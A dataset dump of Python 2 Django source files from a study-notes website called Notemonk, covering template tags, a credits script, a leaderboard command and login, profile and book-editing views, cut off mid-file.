_htmlcolor_to_rgb(self, htmlcolor):\n h = htmlcolor.strip(' #')\n r, g, b = h[:2], h[2:4], h[4:6]\n r = eval('0x' + r)\n g = eval('0x' + g)\n b = eval('0x' + b)\n return r, g, b\n\n def __init__(self, nodelist, link, kwargs):\n self.nodelist = nodelist\n self.link = link\n self.kwargs = kwargs\n\n def render(self, context):\n t = template.loader.get_template('ui/button_widget.html')\n\n button_text = self.nodelist.render(context)\n button_class = 'btncl_' + hashlib.md5(self.link).hexdigest()\n\n for k, v in self.kwargs.iteritems():\n self.kwargs[k] = template.Template(v).render(context)\n\n c = make_context(context)\n c['link'] = template.Template(self.link).render(context)\n c['buttontext'] = button_text\n c['button_class'] = button_class\n\n k = dict(self.kwargs)\n D = self.DEFAULTS\n\n k['title'] = k.get('title') or D['title']\n k['color'] = k.get('color') or D['color']\n k['hcolor'] = k.get('hcolor') or D['hcolor']\n k['borderwidth'] = k.get('borderwidth') or D['borderwidth']\n\n k['tcolor'] = k.get('tcolor') or self._get_text_color(k['color'])\n k['htcolor'] = k.get('htcolor') or self._get_text_color(k['hcolor'])\n \n k['blight'] = k.get('blight') or self._get_lighter_color(k['color'], .3)\n k['bdark'] = k.get('bdark') or self._get_darker_color(k['color'], .3)\n \n k['hblight'] = k.get('hblight') or self._get_lighter_color(k['hcolor'], .3)\n k['hbdark'] = k.get('hbdark') or self._get_darker_color(k['hcolor'], .3)\n\n kwargs = k\n\n for k, v in kwargs.iteritems():\n c[k] = v\n\n c = C(context, c)\n\n return t.render(c)\n\nregister.tag('button', button)\n\ndef thumbnail(obj, size='104x104'):\n\n square = False\n arg_size = size\n if size.startswith('S'):\n square = True\n size = size[1:]\n crop = True\n\n if isinstance(obj, AssociatedMedia):\n image = obj.media\n\n if not image.file:\n try:\n content = get_doc(image.url, settings.CACHE_DIR)\n except:\n obj.delete()\n return thumbnail(NO_IMAGE , size)\n\n content_file = ContentFile(content)\n fname = hashlib.md5(image.url).hexdigest() + '.' + image.url.rsplit('.', 1)[-1]\n image.file.save(fname, content_file, save=True)\n\n file = image.file\n path = file.path\n url = file.url\n\n elif isinstance(obj, FieldFile):\n file = obj\n path = file.path\n url = file.url\n\n elif isinstance(obj, (str, unicode)):\n file_path = obj\n file_path = file_path.split('static', 1)[-1]\n path = settings.MEDIA_ROOT + file_path\n url = settings.MEDIA_URL + file_path\n else:\n return thumbnail(NO_IMAGE , size)\n\n # defining the size\n dimensions = [int(x) if x.isdigit() else None for x in size.lower().split('x')]\n\n # defining the filename and the miniature filename\n filehead, filetail = os.path.split(path)\n basename, format = os.path.splitext(filetail)\n miniature = basename + '_' + size + format\n filename = path\n miniature_filename = os.path.join(filehead, miniature)\n filehead, filetail = os.path.split(url)\n miniature_url = filehead + '/' + miniature\n\n if os.path.exists(miniature_filename) and os.path.getmtime(filename) > os.path.getmtime(miniature_filename):\n os.unlink(miniature_filename)\n\n # if the image wasn't already resized, resize it\n if not os.path.exists(miniature_filename):\n \n try:\n image = PIL.open(filename)\n except IOError:\n if isinstance(obj, AssociatedMedia):\n obj.delete()\n return thumbnail(NO_IMAGE , size)\n\n format = image.format\n\n if image.mode != 'RGBA' and format != 'BMP':\n image = image.convert('RGBA')\n \n if square:\n width, height = image.size\n side = min(width, height)\n x = (width - side) / 2\n y = (height - side) / 2\n image = image.crop((x, y, x+side, y+side))\n\n try:\n image.thumbnail(dimensions, PIL.ANTIALIAS)\n image.save(miniature_filename, format, quality=90)\n except:\n return thumbnail('/static/images/user.png', arg_size)\n\n return miniature_url\n \nregister.filter(thumbnail)\n"
},
{
"alpha_fraction": 0.598954439163208,
"alphanum_fraction": 0.607169508934021,
"avg_line_length": 25.780000686645508,
"blob_id": "60dbbbd94c0dca92c1f6639319d4f4e056e5b0dd",
"content_id": "dea2915e917b6a3285916255d070ac784f99a467",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1339,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 50,
"path": "/www/scripts/assign_credits.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport sys\nfrom decimal import Decimal\n\nfrom django.db.models import Sum, Q\n\nfrom core.models import *\nimport notification.models as notification\n\nIGNORE_USERS = User.objects.filter(Q(is_staff=True) | Q(is_superuser=True))\n\ndef ignore_points():\n points = 0\n\n for u in IGNORE_USERS:\n points += u.get_profile().points\n\n return points\n\ndef main(credits, mock=True):\n\n credits_assigned = 0.0\n total_points = UserProfile.objects.all().aggregate(Sum('points'))\n total_points = total_points['points__sum']\n total_points -= ignore_points()\n\n for u in UserProfile.objects.all():\n \n if u.user in IGNORE_USERS:\n continue\n\n if u.points <= 1:\n continue\n\n user_credits = (u.points / float(total_points)) * credits\n if not mock:\n cur_credits = Decimal(str(user_credits))\n u.credits += cur_credits\n u.save()\n notification.send([u.user], 'credits_earned',\n {'user': u.user, 'credits': '%.2f' % cur_credits})\n\n print '%20s\\t%.2f' % (u.user.username, user_credits)\n credits_assigned += user_credits\n\n print 'Credits assigned: %.2f' % credits_assigned\n print 'Credits Leftover: %.2f' % (credits - credits_assigned)\n\nif __name__ == '__main__':\n main(int(sys.argv[1]))\n"
},
{
"alpha_fraction": 0.5872156023979187,
"alphanum_fraction": 0.5937161445617676,
"avg_line_length": 28.774192810058594,
"blob_id": "7cfaf298b42c3ad513d709584554844a20a40f27",
"content_id": "af299d2411e66c31ad0b49c570bd3679805ba4ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 923,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 31,
"path": "/www/core/management/commands/update_leaderboarddata.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import datetime\nfrom itertools import groupby\n\nfrom django.core.management.base import BaseCommand\n\nfrom core.models import *\n\nclass Command(BaseCommand):\n help = \"Load data into leaderboard table\"\n args = ''\n\n def handle(self, *args, **options):\n\n ratings = Ratings.objects.order_by('-date_added')[:10000]\n users = [(r.user.id, r.user) for r in ratings]\n users.sort()\n users = [u for _id, u in users]\n users = [list(g) for key, g in groupby(users, lambda u: u.id)]\n users = [(len(g), g) for g in users]\n users.sort()\n users.reverse()\n users = [u[0] for count, u in users]\n\n LeaderBoardData.objects.all().delete()\n for u in users:\n LeaderBoardData.objects.create(tag='active',\n target_type=u.get_profile().ctype,\n target_id=u.get_profile().id)\n\n def usage(self, subcommand):\n return ''\n"
},
{
"alpha_fraction": 0.5587482452392578,
"alphanum_fraction": 0.5604161024093628,
"avg_line_length": 34.278663635253906,
"blob_id": "198e1ccc86a85d7c6c2d880cd08fa81b317f8ec4",
"content_id": "397ee3e71fce8149218f45ba8ff029cc8953b3c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 68351,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 1884,
"path": "/www/core/views.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from __future__ import with_statement\r\nimport os\r\nimport re\r\nimport datetime\r\nfrom cStringIO import StringIO\r\nfrom itertools import chain\r\nimport hashlib\r\n\r\nimport Image as PIL\r\nimport simplejson as json\r\n\r\nfrom django.core.urlresolvers import reverse\r\nfrom django import template\r\nfrom django.template import Context\r\nfrom django.shortcuts import render_to_response\r\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseServerError\r\nfrom django.contrib.contenttypes.models import ContentType\r\nfrom django.template import RequestContext\r\nfrom django.core.exceptions import ObjectDoesNotExist\r\nfrom django.contrib.auth import authenticate, login, logout\r\nfrom django.contrib.auth.decorators import login_required\r\n#from pure_pagination import Paginator, InvalidPage, EmptyPage\r\n#from flynsarmy_paginator.paginator import FlynsarmyPaginator\r\nfrom django.core.paginator import Paginator, InvalidPage, EmptyPage\r\nfrom django.core.files.base import ContentFile\r\nfrom django.db import IntegrityError, connection\r\nfrom django.db.models.query import QuerySet\r\nfrom django.db.models import Q\r\nfrom django.conf import settings\r\nfrom django.core.files.uploadhandler import TemporaryFileUploadHandler\r\n\r\n\r\nfrom reversion import revision\r\nfrom reversion.models import Version\r\nimport notification.models as notification\r\nfrom notification.models import NoticeSetting, NoticeType\r\nimport facebook.djangofb as facebook\r\nfrom django.core.mail import send_mail\r\n\r\nfrom models import *\r\nfrom utils import get_doc, xcode, sanitize_whitespace, urlsafe, get_md5\r\nfrom utils import get_target, get_target_from_req, QuerySetFilter, QuerySetMerge\r\nfrom forms import LoginForm, UserProfileForm, FeedbackForm, InviteForm\r\nfrom forms import AddBookForm, EditBookForm, MailingAddressForm\r\nfrom forms import make_notifications_form, EmailForm\r\nfrom query import load_videos, get_items_by_tag, get_top_users\r\nfrom points import give_points\r\n\r\nITEMS_PER_PAGE = 10\r\nWALL_ITEMS_PER_PAGE = 25\r\nREVISIONS_PER_PAGE = 10\r\nPOINT_HISTORY_PER_PAGE = 10\r\nDEFAULT_PAGE_TITLE = 'Notemonk - A brand new way to experience your books.'\r\nPTITLE = '%s - Notemonk'\r\n\r\ndef render_response(req, template, data=None):\r\n data = data or {}\r\n r = RequestContext(req)\r\n\r\n data['ref_path'] = req.get_full_path()\r\n if 'page_title' not in data:\r\n data['page_title'] = DEFAULT_PAGE_TITLE\r\n\r\n return render_to_response(template, data, context_instance=r)\r\n\r\ndef render_error(request, message):\r\n return render_response(request, 'ui/base.html',\r\n {'error': message})\r\n\r\ndef custom_login_required(fn):\r\n def login_req(request, *args, **kwargs):\r\n next = request.POST['ref_path'] if 'ref_path' in request.POST \\\r\n else ''\r\n if not next:\r\n next = request.get_full_path()\r\n\r\n if not request.user.is_authenticated():\r\n return HttpResponseRedirect('/login/?next=%s' % next)\r\n\r\n if not request.user.email:\r\n return HttpResponseRedirect('/email/?next=%s' % next)\r\n\r\n return fn(request, *args, **kwargs)\r\n return login_req\r\n\r\ndef ensure_no_mem_file(fn):\r\n def wrapper(request, *args, **kwargs):\r\n request.upload_handlers = [TemporaryFileUploadHandler()]\r\n return fn(request, *args, **kwargs)\r\n return wrapper\r\n\r\ndef ncert_view(request):\r\n page_title = PTITLE % 'Download NCERT Books'\r\n return render_response(request, 'ui/groups/ncert.html', {\r\n 'page_title': page_title})\r\n\r\ndef tamilnadu_view(request):\r\n page_title = PTITLE % 'Download Tamilnadu Books'\r\n return render_response(request, 'ui/groups/tamilnadu.html', {\r\n 'page_title': page_title})\r\n\r\ndef bits_view(request):\r\n page_title = PTITLE % 'Download BITS MSSS Books'\r\n return render_response(request, 'ui/groups/bits_msss.html', {\r\n 'page_title': page_title})\r\ndef anu_view(request):\r\n page_title = PTITLE % 'Download Acharya Nagarjuna University (ANU) Books'\r\n return render_response(request, 'ui/groups/anu_books.html', {\r\n 'page_title': page_title})\r\n\r\ndef ipe_view(request):\r\n page_title = PTITLE % 'Download Andhra Pradesh Intermediate Books'\r\n return render_response(request, 'ui/groups/ipe_books.html', {\r\n 'page_title': page_title})\r\ndef cbse_view(request):\r\n page_title = PTITLE % 'Download CBSE Books'\r\n return render_response(request, 'ui/groups/cbse_books.html', {\r\n 'page_title': page_title})\r\n\r\ndef aieee_view(request):\r\n page_title = PTITLE % 'Download AIEEE Books'\r\n return render_response(request, 'ui/groups/aieee_books.html', {\r\n 'page_title': page_title})\r\ndef iitjee_view(request):\r\n page_title = PTITLE % 'Download IITJEE Books'\r\n return render_response(request, 'ui/groups/iitjee_books.html', {\r\n 'page_title': page_title})\r\ndef upsc_view(request):\r\n page_title = PTITLE % 'Download UPSC Books'\r\n return render_response(request, 'ui/groups/upsc_books.html', {\r\n 'page_title': page_title})\r\ndef privacy_policy_view(request):\r\n page_title = \"Privacy Policy\"\r\n return render_response(request, 'ui/privacy_policy.html', {\r\n 'page_title': page_title})\r\n\r\n# background ad [ bad.html ]\r\ndef bad_view(request):\r\n page_title = PTITLE % 'Background ad'\r\n return render_response(request, 'ui/bad.html', {\r\n 'page_title': page_title})\r\n\r\n\r\ndef get_followers(*objects):\r\n objects = [get_root(o) for o in objects]\r\n objects = [o for o in objects if o]\r\n followers = set(chain(*[[f.user for f in o.followers.all()] for o in objects]))\r\n\r\n superusers_notify = getattr(settings, 'SUPERUSERS_NOTIFY', False)\r\n if superusers_notify:\r\n superusers = User.objects.filter(is_superuser=True)\r\n followers.update(superusers)\r\n\r\n return list(followers)\r\n\r\ndef get_root(object):\r\n target = object\r\n\r\n while target:\r\n if hasattr(target, 'follow'):\r\n return target\r\n\r\n target = getattr(target, 'target', None)\r\n\r\ndef follow_root(target, user):\r\n root = get_root(target)\r\n if root:\r\n return root.follow(user)\r\n\r\ndef add_to_book_stream(target, activity):\r\n root = get_root(target)\r\n return root.stream.add(activity) if root and isinstance(root, Book) else None\r\n\r\ndef make_paginator(queryset, page_no, num):\r\n page_no = page_no or 1\r\n num = num or ITEMS_PER_PAGE\r\n paginator = Paginator(queryset, int(num))\r\n try:\r\n paginator = paginator.page(int(page_no))\r\n except (EmptyPage, InvalidPage):\r\n paginator = paginator.page(paginator.num_pages)\r\n\r\n return paginator\r\n\r\ndef login_view(request):\r\n top_users = get_top_users()\r\n\r\n next = ''\r\n if request.method == 'POST':\r\n form = LoginForm(request.POST)\r\n if form.is_valid():\r\n next = request.POST['ref_path'] if 'ref_path' in request.POST \\\r\n else ''\r\n\r\n username = form.cleaned_data['username']\r\n password = form.cleaned_data['password']\r\n persistent = form.cleaned_data['persistent']\r\n\r\n if not persistent:\r\n request.session.set_expiry(0)\r\n\r\n user = authenticate(username=username, password=password)\r\n if user:\r\n if user.is_active:\r\n login(request, user)\r\n else:\r\n return render_response(request, 'ui/login.html', {\r\n 'next': next,\r\n 'form': form,\r\n 'top_users': top_users,\r\n 'avoid': True,\r\n 'error': \"Your account is de-activated\"\r\n })\r\n\r\n else:\r\n return render_response(request, 'ui/login.html', {\r\n 'next': next,\r\n 'form': form,\r\n 'top_users': top_users,\r\n 'avoid': True,\r\n 'error': \"Your Username or Password was incorrect\"\r\n })\r\n\r\n return HttpResponseRedirect(next or reverse('home_page'))\r\n else:\r\n if request.user.is_authenticated():\r\n return HttpResponseRedirect(reverse('home_page'))\r\n\r\n next = request.GET['next'] if 'next' in request.GET else ''\r\n form = LoginForm()\r\n\r\n return render_response(request, 'ui/login.html', {\r\n 'next': next,\r\n 'form': form,\r\n 'top_users': top_users,\r\n 'avoid': True,\r\n 'page_title': PTITLE % 'Login'\r\n })\r\n\r\ndef logout_user(request):\r\n logout(request)\r\n return HttpResponseRedirect(reverse('home_page'))\r\n\r\n@login_required\r\ndef email_view(request):\r\n next = ''\r\n email = ''\r\n error = ''\r\n\r\n top_users = get_top_users()\r\n\r\n if request.method == 'POST':\r\n form = EmailForm(request.POST)\r\n next = request.POST['ref_path']\r\n\r\n if form.is_valid():\r\n email = form.cleaned_data['email']\r\n re_enter_email = form.cleaned_data['re_enter_email']\r\n if email != re_enter_email:\r\n error = 'Please re-enter email correctly'\r\n return render_response(request, 'ui/email.html',\r\n {'form': form,\r\n 'next': next,\r\n 'top_users': top_users,\r\n 'error': error,\r\n 'page_title': PTITLE % 'Email'})\r\n\r\n request.user.email = email\r\n request.user.save()\r\n\r\n return HttpResponseRedirect(next or reverse('home_page'))\r\n else:\r\n form = EmailForm()\r\n next = request.GET['next'] if 'next' in request.GET else ''\r\n\r\n error = 'Hi Facebook user, please enter your email-id below.'\r\n\r\n return render_response(request, 'ui/email.html',\r\n {'form': form,\r\n 'next': next,\r\n 'top_users': top_users,\r\n 'error': error,\r\n 'page_title': PTITLE % 'Email'})\r\n\r\ndef _filter_stream(filter, user):\r\n filter_str = '' if filter == 'activities' else filter + '/'\r\n paging_url = '/user/%s/%s<PAGENO>/' % (user.username, filter_str)\r\n use_target = False\r\n as_wall = False\r\n\r\n page_title = PTITLE % ('%s of %s' % (filter.capitalize(), user.get_profile().title))\r\n\r\n if filter == 'notes':\r\n stream = Note.objects.filter(user=user)\r\n elif filter == 'videos':\r\n stream = AssociatedMedia.objects.filter(user=user)\r\n as_wall = True\r\n elif filter == 'questions':\r\n stream = user.get_profile().questions\r\n elif filter == 'answers':\r\n stream = user.get_profile().answers\r\n elif filter == 'books':\r\n stream = user.get_profile().books\r\n as_wall = True\r\n elif filter == 'fbooks':\r\n stream = user.get_profile().following_books\r\n as_wall = True\r\n elif filter == 'followers':\r\n stream = user.get_profile().followers.all()\r\n stream = QuerySetFilter(stream, lambda x: x.user.get_profile())\r\n as_wall = True\r\n elif filter == 'following':\r\n stream = user.get_profile().following\r\n as_wall = True\r\n elif filter == 'referred':\r\n stream = user.get_profile().referred\r\n as_wall = True\r\n elif filter == 'comments':\r\n stream = user.get_profile().comments\r\n elif filter == 'points':\r\n stream = user.get_profile().points_history\r\n\r\n return stream, paging_url, use_target, as_wall, page_title\r\n\r\ndef user_items_view(request, username=None, page_no=1, num=None, filter=None):\r\n\r\n try:\r\n username = username or request.user.username\r\n page_user = User.objects.get(username=username)\r\n except User.DoesNotExist:\r\n return render_response(request, 'ui/base.html', {'error': 'User not known'})\r\n\r\n stream, paging_url, use_target, as_wall, page_title = _filter_stream(filter, page_user)\r\n stream = make_paginator(stream, page_no, num)\r\n\r\n num = WALL_ITEMS_PER_PAGE if as_wall else ITEMS_PER_PAGE\r\n template = 'ui/user_wall.html' if as_wall else 'ui/user_items.html'\r\n\r\n return render_response(request, template,\r\n {'page_user': page_user,\r\n 'page_title': page_title,\r\n 'stream': stream,\r\n 'paging_url': paging_url,\r\n 'use_target': use_target})\r\n\r\ndef _get_activity_stream(request, page_user, a_id):\r\n\r\n book_streams = []\r\n\r\n if page_user == request.user:\r\n users = [page_user] + [x.user for x in page_user.get_profile().following]\r\n\r\n # dont show Notemonk's activities to followers (too many items)\r\n if page_user.id != 1:\r\n users = [u for u in users if u.id != 1]\r\n\r\n stream = Activity.objects.filter(user__in=users)\r\n\r\n for b in page_user.get_profile().following_books:\r\n bstream = StreamItem.objects.filter(stream=b.stream).order_by('-id')\r\n\r\n if a_id is not None:\r\n bstream = bstream.filter(activity__lte=a_id)\r\n\r\n bstream = QuerySetFilter(bstream, lambda x: x.activity)\r\n book_streams.append(bstream)\r\n\r\n else:\r\n stream = Activity.objects.filter(user=page_user)\r\n\r\n # activities associated with user\r\n user_stream = page_user.get_profile().stream\r\n user_stream = StreamItem.objects.filter(stream=user_stream)\r\n\r\n if a_id is not None:\r\n stream = stream.filter(id__lte=a_id)\r\n user_stream = user_stream.filter(activity__lte=a_id)\r\n\r\n user_stream = QuerySetFilter(user_stream, lambda x: x.activity)\r\n streams = [stream, user_stream]\r\n streams.extend(book_streams)\r\n\r\n stream = QuerySetMerge(streams, '-id')\r\n\r\n return stream\r\n\r\ndef _find_slot(slots, activity):\r\n MAX_ITEMS_PER_SLOT = 8\r\n MAX_TIMEDIFF = 3600 #seconds or 1 hour\r\n\r\n dt = activity.date_added\r\n target = activity.target\r\n\r\n for index, s in enumerate(reversed(slots)):\r\n s_target = s['target']\r\n s_dt = s['dt']\r\n s_items = s['items']\r\n\r\n if len(s_items) >= MAX_ITEMS_PER_SLOT and\\\r\n not isinstance(target, Comment):\r\n continue\r\n\r\n if index != 0:\r\n tdiff = max(dt, s_dt) - min(dt, s_dt)\r\n tdiff = tdiff.seconds\r\n if tdiff > MAX_TIMEDIFF:\r\n continue\r\n\r\n if isinstance(target, PointsHistory):\r\n if isinstance(s_target, PointsHistory):\r\n return s\r\n\r\n elif isinstance(target, Ratings):\r\n if isinstance(s_target, Ratings):\r\n return s\r\n\r\n elif isinstance(target, Comment):\r\n ctarget = target.target\r\n if ctarget == s_target:\r\n return s\r\n\r\n elif isinstance(target, ProfilePost):\r\n if target == s_target:\r\n return s\r\n\r\n # slot not found for comment, so create slot\r\n if isinstance(target, Comment):\r\n slots.append({'target': target.target, 'dt': activity.date_added, 'items': []})\r\n return slots[-1]\r\n\r\ndef _make_stream_from_slots(slots):\r\n stream = []\r\n\r\n for s in slots:\r\n items = s['items']\r\n if len(items) == 1:\r\n stream.append(items[0])\r\n\r\n else:\r\n stream.append(ItemGroup(items))\r\n\r\n return stream\r\n\r\ndef _digest_activity_stream(stream, num_items=ITEMS_PER_PAGE):\r\n\r\n next_id = None\r\n slots = []\r\n\r\n activities_seen = set()\r\n\r\n counter = 0\r\n for a in stream[:100]:\r\n if a.id in activities_seen:\r\n continue\r\n activities_seen.add(a.id)\r\n\r\n counter += 1\r\n next_id = a.id - 1\r\n\r\n slot = _find_slot(slots, a)\r\n if slot:\r\n if slot['target'] != a.target:\r\n slot['items'].append(a)\r\n else:\r\n slot = {'target': a.target,\r\n 'dt': a.date_added,\r\n 'items': [a]}\r\n slots.append(slot)\r\n\r\n if len(slots) >= num_items:\r\n break\r\n\r\n stream = _make_stream_from_slots(slots)\r\n\r\n return stream, next_id\r\n\r\ndef user_view(request, username=None, a_id=None):\r\n\r\n try:\r\n username = username or request.user.username\r\n page_user = User.objects.get(username=username)\r\n except User.DoesNotExist:\r\n return render_response(request, 'ui/base.html', {'error': 'User not known'})\r\n\r\n stream = _get_activity_stream(request, page_user, a_id)\r\n stream, next_id = _digest_activity_stream(stream)\r\n\r\n if a_id is None:\r\n page_title = PTITLE % ('%s' % page_user.get_profile().title)\r\n else:\r\n page_title = PTITLE % ('Activities of %s' % page_user.get_profile().title)\r\n\r\n return render_response(request, 'ui/user_activities.html',\r\n {'page_user': page_user,\r\n 'page_title': page_title,\r\n 'stream': stream,\r\n 'next_id': next_id})\r\n\r\ndef activities_view(request, a_id=None):\r\n\r\n stream = Activity.objects.all()\r\n stream = stream.filter(id__lte=a_id) if a_id is not None else stream\r\n stream = stream.order_by('-id')\r\n stream, next_id = _digest_activity_stream(stream)\r\n\r\n page_title = PTITLE % 'Activities of Notemonkers'\r\n\r\n return render_response(request, 'ui/activities.html',\r\n {'page_title': page_title,\r\n 'stream': stream,\r\n 'next_id': next_id})\r\n\r\nclass PermissionException(Exception):\r\n pass\r\n\r\n@login_required\r\ndef user_edit_view(request):\r\n\r\n error = ''\r\n\r\n try:\r\n page_user = User.objects.get(username=request.user.username)\r\n profile = page_user.get_profile()\r\n\r\n mapping = (\r\n ('first_name', page_user),\r\n ('last_name', page_user),\r\n ('email', page_user),\r\n ('institution', profile),\r\n ('city', profile),\r\n ('state', profile),\r\n ('country', profile),\r\n ('mailing_address', profile),\r\n ('dob', profile),\r\n ('sex', profile),\r\n )\r\n\r\n except User.DoesNotExist:\r\n error = 'User not found'\r\n\r\n if request.method == 'POST':\r\n form = UserProfileForm(request.POST, request.FILES)\r\n nform = make_notifications_form(request.POST)\r\n\r\n if form.is_valid():\r\n\r\n for field, target in mapping:\r\n setattr(target, field, form.cleaned_data[field])\r\n\r\n password = form.cleaned_data['password1']\r\n\r\n if password:\r\n page_user.set_password(password)\r\n\r\n image = request.FILES.get('image')\r\n if image:\r\n cfile = ContentFile(image.read())\r\n profile.image.save(image.name, cfile, save=True)\r\n\r\n page_user.save()\r\n profile.save()\r\n\r\n # notification form processing\r\n for n in NoticeType.objects.all():\r\n\r\n if n.label.startswith('_'):\r\n continue\r\n\r\n value = bool(request.POST[n.label] if n.label in request.POST \\\r\n else False)\r\n\r\n try:\r\n ns = NoticeSetting.objects.create(user=page_user,\r\n notice_type=n, medium='1',\r\n send=value)\r\n except IntegrityError:\r\n ns = NoticeSetting.objects.get(user=page_user,\r\n notice_type=n, medium='1')\r\n ns.send = value\r\n ns.save()\r\n\r\n followers = get_followers(profile)\r\n notification.send(followers, 'profile_changed', {'user': page_user})\r\n\r\n return HttpResponseRedirect(reverse('user_page',\r\n kwargs={'username': page_user.username}))\r\n else:\r\n data = dict([(field, getattr(source, field)) for field, source in mapping])\r\n form = UserProfileForm(data)\r\n\r\n data = {}\r\n for n in NoticeType.objects.all():\r\n try:\r\n ns = NoticeSetting.objects.get(user=page_user,\r\n notice_type=n, medium='1')\r\n value = ns.send\r\n except ObjectDoesNotExist:\r\n value = True\r\n\r\n data[n.label] = value\r\n\r\n nform = make_notifications_form(data)\r\n\r\n return render_response(request, 'ui/user_edit.html',\r\n {'page_user': page_user,\r\n 'error': error,\r\n 'form': form,\r\n 'nform': nform,\r\n 'page_title': PTITLE % ('%s - Edit' % page_user.get_profile().title)})\r\n\r\ndef home_view(request):\r\n #new_notes = Note.objects.order_by('-date_added').\\\r\n # exclude(target_type=\\\r\n # ContentType.objects.get_for_model(UserProfile))\r\n\r\n popular_books = Book.objects.order_by('-tot_count')[:5]\r\n\r\n new_videos = AssociatedMedia.objects.filter(media_type=\\\r\n ContentType.objects.get_for_model(Video)).order_by('-id')[:10]\r\n\r\n #new_questions = Question.objects.order_by('-date_added')\r\n\r\n #active_users = LeaderBoardData.objects.filter(tag='active',\\\r\n # target_type=ContentType.objects.get_for_model(UserProfile))\r\n\r\n top_users = get_top_users()\r\n\r\n #active_topics = LeaderBoardData.objects.filter(tag='active',\\\r\n # target_type=ContentType.objects.get_for_model(Node))\r\n\r\n stream = Activity.objects.order_by('-id')[:50]\r\n stream, next_id = _digest_activity_stream(stream, 20)\r\n\r\n #one_hour_ago = datetime.datetime.now() - datetime.timedelta(hours=1)\r\n #sql_datetime = datetime.datetime.strftime(one_hour_ago, '%Y-%m-%d %H:%M:%S')\r\n #online_users = User.objects.filter(last_login__gt=sql_datetime,\r\n # is_active__exact=1).order_by('-last_login')[:10]\r\n\r\n online_users = Onliners.objects.order_by('id')\r\n online_users = [o.user for o in online_users]\r\n\r\n return render_response(request, 'ui/home.html',\r\n {#'new_notes': new_notes,\r\n 'popular_books': popular_books,\r\n #'new_videos': new_videos,\r\n 'top_users': top_users,\r\n #'active_users': active_users,\r\n #'active_topics': active_topics,\r\n 'online_users': online_users,\r\n #'new_questions': new_questions,\r\n 'stream': stream, 'next_id': next_id})\r\n\r\ndef load_media(contentmodel):\r\n core = User.objects.get(id=1)\r\n\r\n #if not contentmodel.images:\r\n # load_images(contentmodel, core)\r\n\r\n if not contentmodel.videos:\r\n load_videos(contentmodel, core)\r\n\r\ndef book_view(request, book_id):\r\n try:\r\n book = Book.objects.get(id=book_id)\r\n except ObjectDoesNotExist:\r\n return render_response(request, 'ui/base.html',\r\n {'error': 'Could not locate the book. Sorry.'})\r\n\r\n is_editable = book.is_editable_by(request.user)\r\n\r\n return render_response(request, 'ui/book.html',\r\n {'book': book,\r\n 'is_editable': is_editable,\r\n 'subtopics': book.node_set.filter(parent=None).order_by('order'),\r\n 'page_title': PTITLE % ('Book - %s' % book.title)})\r\n\r\n@custom_login_required\r\ndef book_add_view(request):\r\n\r\n if not request.user.get_profile().can_add_book:\r\n return render_response(request, 'ui/base.html',\r\n {'error': 'You cannot add a new book'})\r\n\r\n tags = []\r\n\r\n if request.method == 'POST':\r\n form = AddBookForm(request.POST)\r\n if form.is_valid():\r\n title = form.cleaned_data['title']\r\n isbn = form.cleaned_data['isbn']\r\n tags = form.cleaned_data['tags']\r\n\r\n default_image = os.path.join(settings.MEDIA_ROOT, 'images/book_generic.gif')\r\n default_image = os.path.normpath(default_image)\r\n cfile = ContentFile(open(default_image, 'rb').read())\r\n\r\n book = Book.objects.create(title=title, isbn=isbn, user=request.user)\r\n stream = Stream.objects.create(title='for book: %s' % book.title)\r\n book.stream = stream\r\n\r\n Activity.add(request.user, book)\r\n\r\n tags = Tag.objects.filter(id__in=tags)\r\n for t in tags:\r\n book.tags.create(tag=t)\r\n\r\n book.cover_image.save('%d_default_book.gif' % book.id, cfile, save=True)\r\n book.follow(request.user)\r\n book.rate_up(request.user)\r\n book.save()\r\n\r\n Node.objects.create(title='New topic', book=book,\r\n parent=None, order=0)\r\n\r\n return HttpResponseRedirect(reverse('book_edit_page',\r\n kwargs={'book_id': book.id}))\r\n else:\r\n form = AddBookForm()\r\n\r\n return render_response(request, 'ui/book_add.html',\r\n {'form': form, 'page_title': PTITLE % ('Add book')})\r\n\r\n@custom_login_required\r\ndef book_edit_view(request, book_id):\r\n\r\n try:\r\n book = Book.objects.get(id=book_id)\r\n except ObjectDoesNotExist:\r\n return render_response(request, 'ui/base.html',\r\n {'error': 'Could not locate the book. Sorry.'})\r\n\r\n is_editable = request.user.get_profile().can_edit_book(book)\r\n if not is_editable:\r\n return render_response(request, 'ui/base.html',\r\n {'error': 'You cannot edit this book'})\r\n\r\n data = {'title': book.title, 'isbn': book.isbn,\r\n 'tags': '', 'moderators': ''}\r\n form = EditBookForm(initial=data)\r\n\r\n if request.method == 'POST':\r\n if 'outline_data' in request.POST:\r\n book.update_json(request.POST['outline_data'])\r\n\r\n else:\r\n form = EditBookForm(request.POST)\r\n if form.is_valid():\r\n title = form.cleaned_data['title']\r\n isbn = form.cleaned_data['isbn']\r\n tags = form.cleaned_data['tags']\r\n moderators = form.cleaned_data['moderators']\r\n\r\n # process tags\r\n book.tags.all().delete()\r\n tags = Tag.objects.filter(id__in=tags)\r\n for t in tags:\r\n book.tags.create(tag=t)\r\n\r\n # process moderators\r\n for m in book.moderators.all():\r\n book.moderators.remove(m)\r\n\r\n moderators = User.objects.filter(id__in=moderators)\r\n for m in moderators:\r\n book.moderators.add(m)\r\n\r\n # process image\r\n image = request.FILES.get('image')\r\n if image:\r\n cfile = ContentFile(image.read())\r\n book.cover_image.save(image.name, cfile, save=True)\r\n\r\n book.title = title\r\n book.isbn = isbn\r\n book.save()\r\n\r\n tags = [{'id': t.tag.id, 'name': t.tag.name} for t in book.tags.all()]\r\n tags = json.dumps(tags)\r\n\r\n moderators = [{'id': m.id, 'name': m.get_profile().title}\\\r\n for m in book.moderators.all()]\r\n moderators = json.dumps(moderators)\r\n\r\n return render_response(request, 'ui/book_edit.html',\r\n {'book': book,\r\n 'tags': tags,\r\n 'moderators': moderators,\r\n 'form': form,\r\n 'page_title': PTITLE % 